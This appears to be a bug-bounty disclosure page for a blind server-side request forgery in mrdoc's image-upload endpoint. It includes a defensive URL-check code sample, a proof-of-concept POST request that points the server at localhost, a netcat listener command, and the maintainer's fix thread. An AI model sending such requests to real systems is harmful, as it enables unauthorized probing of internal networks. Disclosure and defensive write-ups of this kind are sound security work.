Server-Side Request Forgery (SSRF) in zmister2016/mrdoc

Valid

Reported on

Feb 23rd 2022


Description

There is a blind SSRF in the remote-image fetch of the /upload_doc_img/ endpoint. The server does not check the hostname before sending an HTTP request to it, and it only saves the response if the Content-Type is a valid image. So this is not a full SSRF, but the blind one can still be used to scan the internal network and send HTTP requests to it.
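A hardened pre-fetch check of the kind this description calls for, added here as an example; it is not code from mrdoc or from the fix commit. The function names and the injectable resolver are assumptions, and the public address 1.2.3.4 used in testing is constructed.

```python
import ipaddress
import socket
from urllib.parse import urlparse


def _is_public(addr):
    # Unwrap IPv4-mapped IPv6 (::ffff:127.0.0.1) so the IPv4 rules apply to it.
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped
    # is_global rejects loopback, RFC 1918, link-local (169.254/16, fe80::/10),
    # shared address space and documentation ranges; multicast is excluded too.
    return addr.is_global and not addr.is_multicast


def is_safe_image_url(url, resolver=socket.getaddrinfo):
    """Hypothetical pre-fetch check: True only if every address the URL's host
    maps to is publicly routable. `resolver` is injectable for offline tests."""
    parsed = urlparse(url)
    if parsed.scheme not in ("http", "https") or not parsed.hostname:
        return False
    host = parsed.hostname
    try:
        # Literal IP in the URL (127.0.0.1, [::1], 0.0.0.0): no DNS needed.
        addrs = [ipaddress.ip_address(host)]
    except ValueError:
        try:
            infos = resolver(host, parsed.port or 80, proto=socket.IPPROTO_TCP)
        except socket.gaierror:
            return False
        # sockaddr[0] is the address text; strip a link-local scope id (%eth0).
        addrs = [ipaddress.ip_address(info[4][0].split("%")[0]) for info in infos]
    # One internal record is enough to fail the URL (covers round-robin answers).
    return bool(addrs) and all(_is_public(a) for a in addrs)


# Caveat: validating the name and then letting the HTTP client re-resolve it
# leaves a TOCTOU / DNS-rebinding window. Connect to the validated address and
# re-check every redirect target (or disable redirects) instead of trusting it.
```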

Proof of Concept

POST /upload_doc_img/ HTTP/1.1
Host: myserver:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: csrftoken=U4FhtxPpcnhZeqt9mW5ZToVONY7mIT8OLrbuOWlSQDHmkZ3BganYOB4YsKu9n2y5; sessionid=2xtj0hfwzr6kb39g26rlkxt1ipksmhnl
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 36

{"url":"http://localhost:9000/test"}

Impact

This vulnerability allows port scanning of the internal network and may even trigger actions on the victim's side if sensitive services are listening on localhost.

We are processing your report and will contact the zmister2016/mrdoc team within 24 hours. 2 years ago
We have contacted a member of the zmister2016/mrdoc team and are waiting to hear back 2 years ago
Anna
2 years ago
Researcher

Any Update?

We have sent a follow up to the zmister2016/mrdoc team. We will try again in 7 days. 2 years ago
Anna
2 years ago
Researcher

Any Update?

We have sent a second follow up to the zmister2016/mrdoc team. We will try again in 10 days. 2 years ago
Anna
2 years ago
Researcher

Any Update?

We have sent a third and final follow up to the zmister2016/mrdoc team. This report is now considered stale. 2 years ago
zmister2016
a year ago
Maintainer

The picture is invalid. Can you provide it again?

Anna
a year ago
Researcher

Unfortunately not; however, it was just a listener on the local server that shows mrdoc will make the request to 127.0.0.1. You can do it on your own server with nc -nlvp 9000

zmister2016 modified the Severity from Medium (6.3) to Medium (6.3) 2 months ago
zmister2016 validated this vulnerability 2 months ago
Anna has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
zmister2016 marked this as fixed in 0.9.1 with commit 944742 2 months ago
zmister2016 has been awarded the fix bounty
This vulnerability will not receive a CVE
zmister2016 published this vulnerability 2 months ago